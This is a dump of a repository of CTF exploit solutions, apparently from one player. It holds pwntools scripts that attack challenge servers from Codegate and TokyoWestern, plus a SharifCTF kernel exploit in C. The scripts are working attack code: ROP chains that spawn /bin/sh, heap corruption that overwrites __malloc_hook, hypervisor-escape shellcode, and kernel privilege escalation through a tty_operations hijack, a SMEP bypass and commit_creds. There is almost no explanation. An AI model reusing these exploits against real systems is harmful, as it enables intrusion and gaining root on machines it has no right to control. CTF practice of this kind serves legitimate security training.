├── 2018 ├── Codegate │ └── melong │ │ ├── exp.py │ │ ├── libc.so.6 │ │ └── melong ├── SharifCTF │ └── kdb │ │ ├── bzImage │ │ ├── exploit.c │ │ ├── interact.c │ │ ├── kdb.i64 │ │ ├── kdb.ko │ │ ├── rootfs.cpio │ │ ├── run.sh │ │ └── struct.h ├── TokyoWestern │ ├── BBQ │ │ ├── BBQ │ │ ├── exp.py │ │ └── libc.so.6 │ ├── escapme │ │ ├── EscapeMe-714f81602f833da6497283263e46ca7918cbc91ba89b0ab4d84460b801a4ed97.tar.gz │ │ └── flag1.py │ └── swap_return │ │ ├── sw.py │ │ └── swap_returns ├── hctf │ └── heapstorm_zero │ │ ├── heapstorm_zero │ │ └── libc64.so ├── nu1lctf │ └── null │ │ └── exploit.py ├── sctf │ ├── WTFGame │ │ ├── exp.py │ │ └── src │ │ │ └── com │ │ │ └── sctf │ │ │ └── verofess │ │ │ ├── Main.java │ │ │ ├── blackmagic │ │ │ ├── FastArray.java │ │ │ └── UnsafeWapper.java │ │ │ └── game │ │ │ ├── Boss.java │ │ │ ├── FLAG.java │ │ │ ├── NormalPlayer.java │ │ │ ├── Save.java │ │ │ ├── VIPPlayer.java │ │ │ ├── WTFGame.java │ │ │ └── interfaces │ │ │ └── IEntity.java │ ├── bufferoverflow1 │ │ ├── bufoverflow_a │ │ ├── bufoverflow_a.i64 │ │ ├── exp.py │ │ └── libc.so.6 │ ├── bufferoverflow2 │ │ ├── bufoverflow_b │ │ ├── bufoverflow_b.i64 │ │ ├── exp.py │ │ └── libc.so.6 │ └── sb │ │ ├── sb.py │ │ ├── ssbb │ │ └── ssbb.i64 └── teaserDrangon │ ├── fastStorage │ ├── exp.py │ ├── faststorage │ ├── libc.so.6 │ └── more.py │ └── production │ ├── lyrics.cc │ └── lyrics.py ├── 2019 ├── *ctf │ └── Chrome.tar.gz └── 0ctf │ └── plang.zip ├── README.md └── tmp ├── babydriver.tar ├── exp.c ├── gdbinit ├── neo.js └── x64.release.zip /2018/Codegate/melong/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | local=0 4 | atta=0 5 | uselibc=0 #0 for no,1 for i386,2 for x64 6 | haslibc=1 7 | pc='' 8 | remote_addr="ch41l3ng3s.codegate.kr" 9 | remote_port=1199 10 | 11 | if uselibc==2 and haslibc==0: 12 | libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so') 13 | else: 14 | if uselibc==1 and haslibc==0: 15 | libc=ELF('/lib/i386-linux-gnu/libc-2.23.so') 16 | else: 17 | if haslibc!=0: 18 | libc=ELF('./libc.so.6') 19 | 20 | p=remote(remote_addr,remote_port) 21 | if haslibc!=0: 22 | libc=ELF('/usr/arm-linux-gnueabi/lib/libc.so.6') 23 | 24 | if local: 25 | context.log_level=True 26 | if atta: 27 | gdb.attach(p) 28 | #gdb.attach(p,open('debug')) 29 | 30 | def ru(a): 31 | return p.recvuntil(a) 32 | 33 | def sn(a): 34 | p.send(a) 35 | 36 | def rl(): 37 | return p.recvline() 38 | 39 | def sl(a): 40 | p.sendline(a) 41 | 42 | def rv(a): 43 | return p.recv(a) 44 | 45 | def raddr(a,l=None): 46 | if l==None: 47 | return u64(rv(a).ljust(8,'\x00')) 48 | else: 49 | return u64(rl().strip('\n').ljust(8,'\x00')) 50 | 51 | def lg(s,addr): 52 | print('\033[1;31;40m') 53 | print("%20s-->0x%x"%(s,addr)) 54 | print('\033[0m') 55 | 56 | def sa(a,b): 57 | p.sendafter(a,b) 58 | 59 | def sla(a,b): 60 | p.sendlineafter(a,b) 61 | 62 | def choice(index): 63 | sla('Type the number:',str(index)) 64 | 65 | def go(payload): 66 | choice(1) 67 | sla('Your height(meters) : ','1') 68 | sla('Your weight(kilograms) : ','1') 69 | choice(3) 70 | sla('take personal training?\n','-1') 71 | choice(4) 72 | sl(payload) 73 | choice(6) 74 | rl() 75 | 76 | def leak(address): 77 | main=0x110CC 78 | pop_r0=0x00011bbc 79 | puts_plt=0x0104A8 80 | puts_got=0x2301c 81 | payload='A'*84+p32(pop_r0)+p32(address)+p32(puts_plt) 82 | payload+=p32(main)*8 83 | go(payload) 84 | data = p.recv(4) 85 | return data 86 | 87 | def hack(): 88 | pop_r0=0x00011bbc 89 | main=0x110CC 90 | puts_plt=0x0104A8 91 | puts_got=0x2301c 92 | payload='A'*84+p32(pop_r0)+p32(puts_got)+p32(puts_plt) 93 | payload+=p32(main)*8 94 | go(payload) 95 | libc.address=u32(p.recv(4))-libc.symbols['puts'] 96 | lg("LIBc",libc.address) 97 | payload='A'*84+p32(pop_r0)+p32(libc.search('/bin/sh').next())+p32(libc.symbols['system']) 98 | go(payload) 99 | p.interactive() 100 | 101 | hack() 102 | -------------------------------------------------------------------------------- /2018/Codegate/melong/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/Codegate/melong/libc.so.6 -------------------------------------------------------------------------------- /2018/Codegate/melong/melong: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/Codegate/melong/melong -------------------------------------------------------------------------------- /2018/SharifCTF/kdb/bzImage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/SharifCTF/kdb/bzImage -------------------------------------------------------------------------------- /2018/SharifCTF/kdb/exploit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | #define COMMAD_ALLOC 0x13371338 19 | #define COMMAD_READ 0x13371339 20 | #define COMMAD_WRITE 0x1337133A 21 | #define COMMAD_FREE 0x1337133D 22 | #define COMMAD_RALLO 0x1337133F 23 | 24 | char buf[0x2000]; 25 | 26 | struct Chunk{ 27 | char name[0x20]; 28 | unsigned long size; 29 | }; 30 | 31 | struct Chunk2{ 32 | char name[0x20]; 33 | char* buf; 34 | unsigned long size; 35 | }; 36 | 37 | struct tty_operations 38 | { 39 | struct tty_struct *(*lookup)(struct tty_driver *, struct file *, int); /* 0 8 */ 40 | int (*install)(struct tty_driver *, struct tty_struct *); /* 8 8 */ 41 | void (*remove)(struct tty_driver *, struct tty_struct *); /* 16 8 */ 42 | int (*open)(struct tty_struct *, struct file *); /* 24 8 */ 43 | void (*close)(struct tty_struct *, struct file *); /* 32 8 */ 44 | void (*shutdown)(struct tty_struct *); /* 40 8 */ 45 | void (*cleanup)(struct tty_struct *); /* 48 8 */ 46 | int (*write)(struct tty_struct *, const unsigned char *, int); /* 56 8 */ 47 | /* --- cacheline 1 boundary (64 bytes) --- */ 48 | int (*put_char)(struct tty_struct *, unsigned char); /* 64 8 */ 49 | void (*flush_chars)(struct tty_struct *); /* 72 8 */ 50 | int (*write_room)(struct tty_struct *); /* 80 8 */ 51 | int (*chars_in_buffer)(struct tty_struct *); /* 88 8 */ 52 | int (*ioctl)(struct tty_struct *, unsigned int, long unsigned int); /* 96 8 */ 53 | long int (*compat_ioctl)(struct tty_struct *, unsigned int, long unsigned int); /* 104 8 */ 54 | void (*set_termios)(struct tty_struct *, struct ktermios *); /* 112 8 */ 55 | void (*throttle)(struct tty_struct *); /* 120 8 */ 56 | /* --- cacheline 2 boundary (128 bytes) --- */ 57 | void (*unthrottle)(struct tty_struct *); /* 128 8 */ 58 | void (*stop)(struct tty_struct *); /* 136 8 */ 59 | void (*start)(struct tty_struct *); /* 144 8 */ 60 | void (*hangup)(struct tty_struct *); /* 152 8 */ 61 | int (*break_ctl)(struct tty_struct *, int); /* 160 8 */ 62 | void (*flush_buffer)(struct tty_struct *); /* 168 8 */ 63 | void (*set_ldisc)(struct tty_struct *); /* 176 8 */ 64 | void (*wait_until_sent)(struct tty_struct *, int); /* 184 8 */ 65 | /* --- cacheline 3 boundary (192 bytes) --- */ 66 | void (*send_xchar)(struct tty_struct *, char); /* 192 8 */ 67 | int (*tiocmget)(struct tty_struct *); /* 200 8 */ 68 | int (*tiocmset)(struct tty_struct *, unsigned int, unsigned int); /* 208 8 */ 69 | int (*resize)(struct tty_struct *, struct winsize *); /* 216 8 */ 70 | int (*set_termiox)(struct tty_struct *, struct termiox *); /* 224 8 */ 71 | int (*get_icount)(struct tty_struct *, struct serial_icounter_struct *); /* 232 8 */ 72 | const struct file_operations *proc_fops; /* 240 8 */ 73 | 74 | /* size: 248, cachelines: 4, members: 31 */ 75 | /* last cacheline: 56 bytes */ 76 | }; 77 | 78 | typedef int __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred); 79 | typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred); 80 | 81 | unsigned long membase=0; 82 | _commit_creds commit_creds; 83 | _prepare_kernel_cred prepare_kernel_cred; 84 | unsigned long native_write_cr4; 85 | unsigned long xchgeaxesp; 86 | unsigned long popraxret; 87 | unsigned long base; 88 | 89 | void get_root_payload(void) 90 | { 91 | commit_creds(prepare_kernel_cred(0)); 92 | } 93 | 94 | void get_shell() 95 | { 96 | if(getuid()!=0){ 97 | puts("Get root failed!!!"); 98 | exit(0); 99 | } 100 | system("/bin/sh"); 101 | } 102 | 103 | struct tty_operations fake_ops; 104 | 105 | char fake_procfops[1024]; 106 | 107 | unsigned long user_cs, user_ss, user_rflags; 108 | 109 | static void save_state() 110 | { 111 | asm( 112 | "movq %%cs, %0\n" 113 | "movq %%ss, %1\n" 114 | "pushfq\n" 115 | "popq %2\n" 116 | : "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags) 117 | : 118 | : "memory"); 119 | } 120 | 121 | 122 | static void shellcode() 123 | { 124 | 125 | commit_creds(prepare_kernel_cred(0)); 126 | asm( 127 | "swapgs\n" 128 | "movq %0,%%rax\n" // push things into stack for iretq 129 | "pushq %%rax\n" 130 | "movq %1,%%rax\n" 131 | "pushq %%rax\n" 132 | "movq %2,%%rax\n" 133 | "pushq %%rax\n" 134 | "movq %3,%%rax\n" 135 | "pushq %%rax\n" 136 | "movq %4,%%rax\n" 137 | "pushq %%rax\n" 138 | "iretq\n" 139 | : 140 | :"r"(user_ss),"r"(base+0x500),"r"(user_rflags),"r"(user_cs),"r"(get_shell) 141 | :"memory" 142 | ); 143 | } 144 | int main() 145 | { 146 | struct Chunk ch1; 147 | struct Chunk* p1; 148 | struct Chunk2 ch2; 149 | struct Chunk2* p2; 150 | unsigned long * ptr; 151 | p1=&ch1; 152 | p2=&ch2; 153 | p2->buf=buf; 154 | int fd,devfd; 155 | char *fake_file_operations = (char*) calloc(0x1000, 1); // big enough to be file_operations 156 | struct tty_operations *fake_tty_operations = (struct tty_operations *) malloc(sizeof(struct tty_operations)); 157 | memset(fake_tty_operations, 0, sizeof(struct tty_operations)); 158 | fd=open("/dev/kdb",O_RDWR); 159 | memset(ch1.name,0,0x20); 160 | memset(ch2.name,0,0x20); 161 | memset(buf,0,0x1000); 162 | strcpy(p1->name,"aaa\n"); 163 | p1->size=0x2e0; 164 | ioctl(fd,COMMAD_ALLOC,p1); 165 | strcpy(p2->name,"aaa\n"); 166 | p2->size=0xFFFFFFFFFFFFF; 167 | p2->buf=buf; 168 | ioctl(fd,COMMAD_RALLO,p2); 169 | devfd=open("/dev/ptmx",O_RDWR|O_NOCTTY); 170 | p2->size=0x30; 171 | ioctl(fd,COMMAD_READ,p2); 172 | ptr=buf+24; 173 | membase=*ptr; 174 | 175 | unsigned long pre_static=0xffffffff8103d1a0; 176 | prepare_kernel_cred=membase-0xffffffff81c1bea0+0xffffffff81a3d1a0; 177 | commit_creds=prepare_kernel_cred-0x1a0+0x3a0; 178 | native_write_cr4=prepare_kernel_cred-pre_static+0xffffffff81008880; 179 | popraxret=prepare_kernel_cred-pre_static+0xffffffff8102da84; 180 | xchgeaxesp=prepare_kernel_cred-pre_static+0xffffffff8100008a; 181 | save_state(); 182 | 183 | fake_tty_operations->proc_fops = &fake_file_operations; 184 | fake_tty_operations->ioctl = xchgeaxesp; 185 | *ptr = (unsigned long)fake_tty_operations; 186 | ioctl(fd,COMMAD_WRITE,p2); 187 | 188 | unsigned long lower_address = xchgeaxesp & 0xFFFFFFFF; 189 | base = lower_address & ~0xfff; 190 | if (mmap(base, 0x30000, 7, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) != base) { 191 | perror("mmap"); 192 | exit(1); 193 | } 194 | 195 | unsigned long rop[]={ 196 | popraxret, 197 | 0x6f0, 198 | native_write_cr4, 199 | base+0x1000, 200 | (unsigned long)shellcode 201 | }; 202 | 203 | //prepare_kernel_cred=real_cred; 204 | memcpy((void*)lower_address, rop, sizeof(rop)); 205 | ioctl(devfd,0,0); 206 | 207 | return 0; 208 | } 209 | 210 | -------------------------------------------------------------------------------- /2018/SharifCTF/kdb/interact.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | #define COMMAD_ALLOC 0x13371338 13 | #define COMMAD_READ 0x13371339 14 | #define COMMAD_WRITE 0x1337133A 15 | #define COMMAD_FREE 0x1337133D 16 | #define COMMAD_RALLO 0x1337133F 17 | 18 | char buf[0x2000]; 19 | 20 | struct Chunk{ 21 | char name[0x20]; 22 | unsigned long size; 23 | }; 24 | 25 | struct Chunk2{ 26 | char name[0x20]; 27 | char* buf; 28 | unsigned long size; 29 | }; 30 | 31 | void menu(){ 32 | puts("1. alloc"); 33 | puts("2. read"); 34 | puts("3. write"); 35 | puts("4. free"); 36 | puts("5. realloc"); 37 | puts("6. open ptmx"); 38 | puts("7. exit"); 39 | puts("Choice:"); 40 | } 41 | 42 | int main(){ 43 | int choice; 44 | struct Chunk ch1; 45 | struct Chunk* p1; 46 | struct Chunk2 ch2; 47 | struct Chunk2* p2; 48 | p1=&ch1; 49 | p2=&ch2; 50 | p2->buf=buf; 51 | unsigned long ss; 52 | int fd; 53 | int i; 54 | int res; 55 | int rs; 56 | int pid; 57 | fd=open("/dev/kdb",O_RDWR); 58 | while(1){ 59 | menu(); 60 | scanf("%d",&choice); 61 | memset(ch1.name,0,0x20); 62 | memset(ch2.name,0,0x20); 63 | memset(buf,0,0x1000); 64 | switch(choice){ 65 | case 1: 66 | puts("Name:"); 67 | rs=read(0,p1->name,0x20); 68 | puts("Size:"); 69 | scanf("%lx",&p1->size); 70 | res=ioctl(fd,COMMAD_ALLOC,p1); 71 | printf("Return value:%d\n",res); 72 | break; 73 | case 2: 74 | puts("Name:"); 75 | read(0,p2->name,0x20); 76 | puts("Size:"); 77 | scanf("%lx",&p2->size); 78 | res=ioctl(fd,COMMAD_READ,p2); 79 | printf("Return value:%d\n",res); 80 | puts(p2->buf); 81 | for(i=0;i<(p2->size/8);i++){ 82 | if(i%4==0)puts(""); 83 | printf("%16lx ",*((unsigned long*)(p2->buf+8*i))); 84 | } 85 | puts(""); 86 | break; 87 | case 3: 88 | puts("Name:"); 89 | read(0,p2->name,0x20); 90 | puts("Size:"); 91 | scanf("%lx",&p2->size); 92 | puts("Content:"); 93 | read(0,p2->buf,0x1000); 94 | res=ioctl(fd,COMMAD_WRITE,p2); 95 | printf("Return value:%d\n",res); 96 | break; 97 | case 4: 98 | puts("Name:"); 99 | read(0,p1->name,0x20); 100 | res=ioctl(fd,COMMAD_FREE,p1); 101 | printf("Return value:%d\n",res); 102 | break; 103 | case 5: 104 | puts("Name:"); 105 | read(0,p2->name,0x20); 106 | puts("Size:"); 107 | scanf("%lx",&p2->size); 108 | res=ioctl(fd,COMMAD_RALLO,p2); 109 | printf("Return value:%d\n",res); 110 | break; 111 | case 6: 112 | open("/dev/ptmx",O_RDWR|O_NOCTTY); 113 | break; 114 | case 7: 115 | return 0; 116 | } 117 | } 118 | } 119 | -------------------------------------------------------------------------------- /2018/SharifCTF/kdb/kdb.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/SharifCTF/kdb/kdb.i64 -------------------------------------------------------------------------------- /2018/SharifCTF/kdb/kdb.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/SharifCTF/kdb/kdb.ko -------------------------------------------------------------------------------- /2018/SharifCTF/kdb/rootfs.cpio: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/SharifCTF/kdb/rootfs.cpio -------------------------------------------------------------------------------- /2018/SharifCTF/kdb/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | qemu-system-x86_64 -cpu kvm64,+smep -m 64M -kernel ./bzImage -initrd ./rootfs.cpio -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" -smp cores=2,threads=1,sockets=1 -monitor /dev/null -nographic 2>/dev/null 4 | -------------------------------------------------------------------------------- /2018/SharifCTF/kdb/struct.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | struct Chunk{ 4 | char name[32]; 5 | unsigned long size; 6 | }; 7 | 8 | struct Manage{ 9 | struct Chunk2* next; 10 | struct Chunk2* prev; 11 | }; 12 | 13 | 14 | struct Chunk2{ 15 | char name[32]; 16 | char* buffer; 17 | unsigned long size; 18 | struct Manage man; 19 | }; 20 | -------------------------------------------------------------------------------- /2018/TokyoWestern/BBQ/BBQ: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/TokyoWestern/BBQ/BBQ -------------------------------------------------------------------------------- /2018/TokyoWestern/BBQ/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | local=0 4 | pc='/tmp/pwn/BBQ_debug' 5 | remote_addr="pwn1.chal.ctf.westerns.tokyo" 6 | remote_port=21638 7 | aslr=True 8 | 9 | libc=ELF('./libc.so.6') 10 | #libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so') 11 | #libc=ELF('/lib/i386-linux-gnu/libc-2.23.so') 12 | context.log_level=True 13 | if local==1: 14 | #p = process(pc,aslr=aslr) 15 | p = process(pc,aslr=aslr,env={'LD_PRELOAD': './libc.so.6'}) 16 | gdb.attach(p,'c') 17 | else: 18 | p=remote(remote_addr,remote_port) 19 | 20 | ru = lambda x : p.recvuntil(x) 21 | sn = lambda x : p.send(x) 22 | rl = lambda : p.recvline() 23 | sl = lambda x : p.sendline(x) 24 | rv = lambda x : p.recv(x) 25 | sa = lambda a,b : p.sendafter(a,b) 26 | sla = lambda a,b : p.sendlineafter(a,b) 27 | 28 | def lg(s,addr): 29 | print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) 30 | 31 | def raddr(a=6): 32 | if(a!=0): 33 | return u64(rv(a).ljust(8,'\x00')) 34 | else: 35 | return u64(rl().strip('\n').ljust(8,'\x00')) 36 | 37 | def choice(idx): 38 | sla("Choice: ",str(idx)) 39 | 40 | def buy(name,amount): 41 | choice(1) 42 | sla(">> ",name) 43 | sla(">> ",str(amount)) 44 | 45 | def grill(name,idx): 46 | choice(2) 47 | sla(">> ",name) 48 | sla(">> ",str(idx)) 49 | 50 | def eat(idx): 51 | choice(3) 52 | sla(">> ",str(idx)) 53 | 54 | if __name__ == '__main__': 55 | name='x'*0x10+p64(0xDEADBEEF11)[:5] 56 | buy('A'*(62-0x20),123) 57 | buy(p64(0xDEADBEEF11),0xe1) 58 | buy(name,123) 59 | grill(name,0) 60 | grill(name,1) 61 | eat(0) 62 | eat(1) 63 | buy('C'*39,123) 64 | eat(5) 65 | choice(1) 66 | ru("* ") 67 | ru("* ") 68 | heap_addr=raddr(6)-0x110 69 | lg("heap_addr",heap_addr) 70 | sla(">> ","Beef") 71 | sla(">> ",str(1)) 72 | buy('C'*40+p64(heap_addr+0xb0),123) 73 | eat(5) 74 | buy(p64(heap_addr+0xd0),123) 75 | choice(1) 76 | ru("121") 77 | ru("* ") 78 | libc_addr=raddr(6)-0x3c4b78 79 | libc.address=libc_addr 80 | lg("Libc address",libc_addr) 81 | sla(">> ","Beef") 82 | sla(">> ",str(1)) 83 | 84 | 85 | # create a 0x21 above malloc hook 86 | buy(p64(libc.symbols['__malloc_hook']-0x18),123) 87 | choice(1) 88 | k=ru('food na').split(' ') 89 | code=k[-3] 90 | num=(int(k[-2].split('\n')[0][1:-1])) 91 | left=0x100000000-num-0x1 92 | sla(">> ",code) 93 | sla(">> ",str(0x1)) 94 | while(left>0): 95 | if(left<0x7FFFFFFF): 96 | buy(code,left+0x21) 97 | break 98 | else: 99 | buy(code,0x7FFFFFFF) 100 | left-=0x7FFFFFFF 101 | buy(p64(heap_addr+0xd0),123) 102 | buy(p64(heap_addr+0x10),123) 103 | 104 | buy('a'*0x10+p64(0xDEADBEEF11),0x31) 105 | buy(p64(0xDEADBEEF11),0x31) 106 | buy('fuck1',0x31) 107 | buy('C'*40+p64(heap_addr+0x1e0),123) 108 | eat(5) 109 | grill('Beef',0) 110 | eat(0) 111 | 112 | 113 | # fake a food structure in main_arena 114 | buy(p64(0xDEADBEEF11),0xb1) 115 | buy('k'*0x2+p64(heap_addr+0x10),123) 116 | buy('c'*0x1+p64(0xDEADBEEF11),123) 117 | buy(p64(libc.symbols['__malloc_hook']+0x10),123) 118 | buy('C'*40+p64(heap_addr+0x2c0),123) 119 | eat(5) 120 | buy("H"*0x10+p64(heap_addr+0x390),123) 121 | grill('',0) 122 | eat(0) 123 | 124 | 125 | ## modify fastbin[1]'s first pointer to point to a little above malloc hook 126 | left=0x100000000-0x210 127 | while(left>0): 128 | if(left<0x7FFFFFFF): 129 | buy(p64(heap_addr+0x150),left) 130 | break 131 | else: 132 | buy(p64(heap_addr+0x150),0x7FFFFFFF) 133 | left-=0x7FFFFFFF 134 | 135 | 136 | grill("H"*0x10+p64(heap_addr+0x390),1) 137 | eat(1) 138 | oneshot=libc.address+0x4526a 139 | buy(cyclic(0x8)+p64(oneshot),123) 140 | grill(p64(heap_addr+0x150).ljust(64,'\x00'),1) 141 | p.interactive() 142 | -------------------------------------------------------------------------------- /2018/TokyoWestern/BBQ/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/TokyoWestern/BBQ/libc.so.6 -------------------------------------------------------------------------------- /2018/TokyoWestern/escapme/EscapeMe-714f81602f833da6497283263e46ca7918cbc91ba89b0ab4d84460b801a4ed97.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/TokyoWestern/escapme/EscapeMe-714f81602f833da6497283263e46ca7918cbc91ba89b0ab4d84460b801a4ed97.tar.gz -------------------------------------------------------------------------------- /2018/TokyoWestern/escapme/flag1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import os 3 | import sys 4 | 5 | local=0 6 | test=1 7 | if test: 8 | pc='./kvm.elf ./kernel.bin ./memo-static.elf'.split(' ') 9 | mmap_address=0x7fff1ff000 10 | else: 11 | pc='./memo-static.elf' 12 | mmap_address=0x155555550000 13 | 14 | remote_addr="escapeme.chal.ctf.westerns.tokyo" 15 | remote_port=16359 16 | aslr=False 17 | #context.log_level=True 18 | 19 | #libc=ELF('./libc.so.6') 20 | #libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so') 21 | #libc=ELF('/lib/i386-linux-gnu/libc-2.23.so') 22 | 23 | if local==1: 24 | p = process(pc,aslr=aslr) 25 | # gdb.attach(p,'c') 26 | #p = process(pc,aslr=aslr,env={'LD_PRELOAD': './libc.so.6'}) 27 | else: 28 | p=remote(remote_addr,remote_port) 29 | p.sendline(os.popen(p.recvline()).read()) 30 | 31 | ru = lambda x : p.recvuntil(x) 32 | sn = lambda x : p.send(x) 33 | rl = lambda : p.recvline() 34 | sl = lambda x : p.sendline(x) 35 | rv = lambda x : p.recv(x) 36 | sa = lambda a,b : p.sendafter(a,b) 37 | sla = lambda a,b : p.sendlineafter(a,b) 38 | 39 | def lg(s,addr): 40 | print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) 41 | 42 | def raddr(a=6): 43 | if(a==0): 44 | return u64(rv(a).ljust(8,'\x00')) 45 | else: 46 | return u64(rl().strip('\n').ljust(8,'\x00')) 47 | 48 | def choice(idx): 49 | sla("> ",str(idx)) 50 | 51 | def alloc(content): 52 | choice(1) 53 | sa('> ',content) 54 | 55 | def edit(idx,content): 56 | choice(2) 57 | sla("> ",str(idx)) 58 | sa('> ',content) 59 | 60 | def free(idx): 61 | choice(3) 62 | sla("> ",str(idx)) 63 | 64 | if __name__ == '__main__': 65 | alloc("A"*0x28) 66 | B_address=mmap_address+0x10 67 | payload=p64(0)+p64(0x21)+p64(B_address-0x18)+p64(B_address-0x10)+p64(0x20) 68 | alloc(payload) 69 | alloc("C"*0x28) 70 | alloc("D"*0x28) 71 | alloc("E"*0x28) 72 | edit(2,'C'*0x20+p64(0x20+0x30)+p8(0x30)) 73 | free(3) 74 | edit(1,p64(0x604098)[0:3]) 75 | shellcode_addr=0x606060 76 | #payload="\x48\xc7\xc7\x50\x40\x60\x00\x48\xbe\xef\xbe\xad\xde\x00\x00\x00\x00\x48\x89\x37\xeb\xea" 77 | payload=asm(shellcraft.amd64.linux.syscall(0,0,shellcode_addr,0x800),os="linux",arch="amd64") 78 | #payload=asm(shellcraft.amd64.linux.echo("fuck"),os="linux",arch="amd64") 79 | #payload=asm(shellcraft.amd64.linux.write("h")) 80 | payload+="\xeb\xea" 81 | print(len(payload)) 82 | alloc(payload) 83 | alloc("F"*0x28) 84 | alloc("G"*0x28) 85 | edit(0,p64(0x604038)[0:3]) 86 | alloc("J"*0x28) 87 | alloc("H"*0x20+p64(mmap_address+0x18)) 88 | stack_ret=0x7fffffffd8 89 | alloc(p64(0)+p64(stack_ret)+p64(0)) 90 | edit(3,p64(shellcode_addr)[:3]) 91 | payload=asm(shellcraft.amd64.linux.syscall(0x10c8),os="linux",arch="amd64") 92 | #payload+=asm(shellcraft.amd64.linux.syscall(0,0,shellcode_addr,0x800),os="linux",arch="amd64") 93 | #payload=asm(shellcraft.amd64.linux.syscall('SYS_mmap', 0, 0x1000,'PROT_READ | PROT_WRITE | PROT_EXEC','MAP_PRIVATE | MAP_ANONYMOUS',-1, 0),os='linux',arch='amd64') 94 | payload+=asm("mov rdi,0x606020",os="linux",arch="amd64") 95 | payload+=asm("mov [rdi],rax",os="linux",arch="amd64") 96 | payload+=asm(shellcraft.amd64.linux.syscall(10,0x7fff1fe000,0x1000,7),os="linux",arch="amd64") 97 | payload+=asm(shellcraft.amd64.linux.syscall(1,1,0x7fff1fe000,0x40),os="linux",arch="amd64") 98 | payload+=asm(shellcraft.amd64.linux.echo("stGOGO\n"),os="linux",arch="amd64") 99 | payload='\x90'*0x30+payload 100 | rl() 101 | p.sendline(payload) 102 | p.interactive() 103 | -------------------------------------------------------------------------------- /2018/TokyoWestern/swap_return/sw.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | local=1 4 | pc='/tmp/pwn/swap_returns_debug' 5 | remote_addr="swap.chal.ctf.westerns.tokyo" 6 | remote_port=37567 7 | aslr=False 8 | 9 | libc=ELF('./libc.so.6') 10 | #libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so') 11 | #libc=ELF('/lib/i386-linux-gnu/libc-2.23.so') 12 | #context.log_level=True 13 | 14 | if local==1: 15 | p = process(pc,aslr=aslr,env={'LD_PRELOAD': './libc.so.6'}) 16 | gdb.attach(p,'c') 17 | else: 18 | p=remote(remote_addr,remote_port) 19 | 20 | ru = lambda x : p.recvuntil(x) 21 | sn = lambda x : p.send(x) 22 | rl = lambda : p.recvline() 23 | sl = lambda x : p.sendline(x) 24 | rv = lambda x : p.recv(x) 25 | sa = lambda a,b : p.sendafter(a,b) 26 | sla = lambda a,b : p.sendlineafter(a,b) 27 | 28 | def lg(s,addr): 29 | print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) 30 | 31 | def raddr(a=6): 32 | if(a==0): 33 | return u64(rv(a).ljust(8,'\x00')) 34 | else: 35 | return u64(rl().strip('\n').ljust(8,'\x00')) 36 | 37 | def set_addr(addr1,addr2): 38 | sla("choice:",'1') 39 | sla("address:",str(addr1)) 40 | sla("address:",str(addr2)) 41 | 42 | def sw(): 43 | sla("choice:",'2') 44 | 45 | fuck=0x601500 46 | save=0x601700 47 | zero=0x601800 48 | 49 | def make_byte(bt): 50 | global fuck 51 | global save 52 | global zero 53 | i=0 54 | for k in range(len(bt)): 55 | byte=u8(bt[i]) 56 | set_addr(fuck+byte,stack_addr) 57 | sw() 58 | set_addr(fuck+byte+1,zero) 59 | sw() 60 | set_addr(fuck+byte,save+i) 61 | sw() 62 | i+=1 63 | zero+=8 64 | 65 | if __name__ == '__main__': 66 | sla("choice:",'9') 67 | rl() 68 | atoi=0x601050 69 | printf=0x0601038 70 | stack_check_failed=0x601030 71 | setvbuf=0x601048 72 | bss=0x601100 73 | set_addr(atoi,printf) 74 | sw() 75 | sa("choice:",'%x') 76 | rv(8) 77 | stack_addr=int('7fff'+rv(8),16)-6+0x30 78 | lg('stack_addr',stack_addr) 79 | sa("choice:",'a\x00') 80 | sla("address:",str(atoi)) 81 | sla("address:",str(printf)) 82 | sa("choice:",'aa') 83 | set_addr(bss,setvbuf) 84 | sw() 85 | set_addr(bss+0x100,stack_check_failed) 86 | sw() 87 | make_byte(p16(0x6ff0)) 88 